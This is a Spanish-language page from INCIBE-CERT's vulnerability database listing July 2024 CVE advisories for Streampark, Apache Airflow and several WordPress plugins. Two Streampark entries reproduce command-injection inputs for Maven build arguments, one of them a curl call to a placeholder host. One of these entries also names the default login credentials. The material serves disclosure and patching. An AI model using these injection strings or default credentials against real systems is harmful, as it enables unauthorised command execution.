Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Vulnerabilidades

Con el objetivo de informar, advertir y ayudar a los profesionales sobre las ultimas vulnerabilidades de seguridad en sistemas tecnológicos, ponemos a disposición de los usuarios interesados en esta información una base de datos con información en castellano sobre cada una de las ultimas vulnerabilidades documentadas y conocidas.

Este repositorio con más de 75.000 registros esta basado en la información de NVD (National Vulnerability Database) – en función de un acuerdo de colaboración – por el cual desde INCIBE realizamos la traducción al castellano de la información incluida. En ocasiones este listado mostrará vulnerabilidades que aún no han sido traducidas debido a que se recogen en el transcurso del tiempo en el que el equipo de INCIBE realiza el proceso de traducción.

Se emplea el estándar de nomenclatura de vulnerabilidades CVE (Common Vulnerabilities and Exposures), con el fin de facilitar el intercambio de información entre diferentes bases de datos y herramientas. Cada una de las vulnerabilidades recogidas enlaza a diversas fuentes de información así como a parches disponibles o soluciones aportadas por los fabricantes y desarrolladores. Es posible realizar búsquedas avanzadas teniendo la opción de seleccionar diferentes criterios como el tipo de vulnerabilidad, fabricante, tipo de impacto entre otros, con el fin de acortar los resultados.

Mediante suscripción RSS o Boletines podemos estar informados diariamente de las ultimas vulnerabilidades incorporadas al repositorio.

Vulnerabilidad en Streampark (CVE-2023-52291)

Fecha de publicación:
17/07/2024
Idioma:
Español
En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. La validación de los parámetros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecución remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, sólo los usuarios de ese sistema tienen autorización para iniciar sesión y los usuarios no ingresarían manualmente un comando de operación peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Antecedentes: en el módulo "Proyecto", el operador maven build args “<” provoca la inyección de comandos. Por ejemplo: “< (curl http://xxx.com)” se ejecutará como una inyección de comando. Mitigación: todos los usuarios deben actualizar a 2.1.4. El operador "<" se bloqueará.
Gravedad CVSS v3.1: MEDIA
Última modificación:
13/02/2025

Vulnerabilidad en Streampark (CVE-2024-29737)

Fecha de publicación:
17/07/2024
Idioma:
Español
En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. La validación de los parámetros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecución remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, sólo los usuarios de ese sistema tienen autorización para iniciar sesión y los usuarios no ingresarían manualmente un comando de operación peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Mitigación: todos los usuarios deben actualizar a 2.1.4 Información general: inicie sesión en Streampark utilizando el nombre de usuario predeterminado (por ejemplo, test1, test2, test3) y la contraseña predeterminada (streampark). Navegue hasta el módulo Proyecto y luego agregue un nuevo proyecto. Ingrese la dirección del repositorio git del proyecto e ingrese `touch /tmp/success_2.1.2` como "Argumento de compilación". Tenga en cuenta que no existe verificación ni interceptación del carácter especial "`". Como resultado, encontrará que este comando de inyección se ejecutará con éxito después de ejecutar la compilación. En la última versión, se intercepta el símbolo especial `.
Gravedad CVSS v3.1: MEDIA
Última modificación:
13/02/2025

Vulnerabilidad en Apache Airflow (CVE-2024-39877)

Fecha de publicación:
17/07/2024
Idioma:
Español
Apache Airflow 2.4.0 y versiones anteriores a 2.9.3 tienen una vulnerabilidad que permite a los autores de DAG autenticados crear un parámetro doc_md de manera que pueda ejecutar código arbitrario en el contexto del programador, lo que debería estar prohibido según el modelo de seguridad de Airflow. Los usuarios deben actualizar a la versión 2.9.3 o posterior, que eliminó la vulnerabilidad.
Gravedad CVSS v3.1: ALTA
Última modificación:
01/08/2024

Vulnerabilidad en Schema & Structured Data para WP & AMP para WordPress (CVE-2024-5582)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento Schema & Structured Data para WP & AMP para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del atributo 'url' del complemento dentro del widget de bloque de preguntas y respuestas en todas las versiones hasta la 1.33 incluida debido a una sanitización de entrada y un escape de salida insuficientes en los atributos proporcionados por el usuario. Esto hace posible que atacantes autenticados, con acceso de nivel de colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada.
Gravedad CVSS v3.1: MEDIA
Última modificación:
19/07/2024

Vulnerabilidad en Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress (CVE-2024-5703)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress es vulnerable al acceso no autorizado a la API debido a una falta de verificación de capacidad en todas las versiones hasta la 5.7.26 incluida. Esto hace posible que los atacantes autenticados, con acceso a nivel de suscriptor y superior, accedan a la API (siempre que esté habilitada) y agreguen, editen y eliminen usuarios de la audiencia.
Gravedad CVSS v3.1: MEDIA
Última modificación:
19/07/2024

Vulnerabilidad en Keydatas para WordPress (CVE-2024-6220)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento ????? (Keydatas) para WordPress es vulnerable a la carga de archivos arbitrarios debido a la falta de validación del tipo de archivo en la función keydatas_downloadImages en todas las versiones hasta la 2.5.2 incluida. Esto hace posible que atacantes no autenticados carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
01/08/2024

Vulnerabilidad en Apache Airflow (CVE-2024-39863)

Fecha de publicación:
17/07/2024
Idioma:
Español
Las versiones de Apache Airflow anteriores a la 2.9.3 tienen una vulnerabilidad que permite a un atacante autenticado inyectar un enlace malicioso al instalar un proveedor. Se recomienda a los usuarios actualizar a la versión 2.9.3, que soluciona este problema.
Gravedad CVSS v3.1: MEDIA
Última modificación:
01/08/2024

Vulnerabilidad en Ultimate Addons para WPBakery para WordPress (CVE-2024-5255)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento Ultimate Addons para WPBakery para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del código corto ultimate_dual_color del complemento en todas las versiones hasta la 3.19.20 incluida debido a una sanitización de entrada insuficiente y a un escape de salida en los atributos proporcionados por el usuario. Esto hace posible que atacantes autenticados, con acceso de nivel de colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada.
Gravedad CVSS v3.1: MEDIA
Última modificación:
19/07/2024

Vulnerabilidad en Event Manager, Events Calendar, Tickets, Registrations – Eventin para WordPress (CVE-2024-6033)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento Event Manager, Events Calendar, Tickets, Registrations – Eventin para WordPress es vulnerable a la importación de datos no autorizados debido a una falta de verificación de capacidad en la función 'import_file' en todas las versiones hasta la 4.0.4 incluida. Esto hace posible que atacantes autenticados, con acceso de nivel de colaborador y superior, importen eventos, oradores, horarios y datos de los asistentes.
Gravedad CVSS v3.1: MEDIA
Última modificación:
19/07/2024

Vulnerabilidad en BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin para WordPress (CVE-2024-6467)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin para WordPress es vulnerable a la lectura de archivos arbitrarios y la creación de archivos arbitrarios en todas las versiones hasta la 1.1.5 incluida a través de la función 'bookingpress_save_lite_wizard_settings_func'. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, creen archivos arbitrarios que contengan el contenido de archivos en el servidor, permitiendo la ejecución de cualquier código PHP en esos archivos o la exposición de información confidencial.
Gravedad CVSS v3.1: ALTA
Última modificación:
19/07/2024

Vulnerabilidad en BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin para WordPress (CVE-2024-6660)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin para WordPress es vulnerable a modificaciones no autorizadas de datos que pueden provocar una escalada de privilegios debido a una falta de verificación de capacidad en la función bookingpress_import_data_continue_process_func en todas las versiones hasta la 1.1.5 incluida. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, actualicen opciones arbitrarias en el sitio de WordPress y carguen archivos arbitrarios. Esto se puede aprovechar para actualizar la función predeterminada de registro de administrador y permitir el registro de usuarios para que los atacantes obtengan acceso de usuario administrativo a un sitio vulnerable.
Gravedad CVSS v3.1: ALTA
Última modificación:
19/07/2024

Vulnerabilidad en AI ChatBot para WordPress – WPBot para WordPress (CVE-2024-6669)

Fecha de publicación:
17/07/2024
Idioma:
Español
El complemento AI ChatBot para WordPress – WPBot para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de la configuración de administrador en todas las versiones hasta la 5.5.7 incluida debido a una sanitización de entrada y un escape de salida insuficientes. Esto hace posible que atacantes autenticados, con permisos de nivel de administrador y superiores, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada. Esto solo afecta a las instalaciones multisitio y a las instalaciones en las que se ha deshabilitado unfiltered_html.
Gravedad CVSS v3.1: MEDIA
Última modificación:
12/05/2025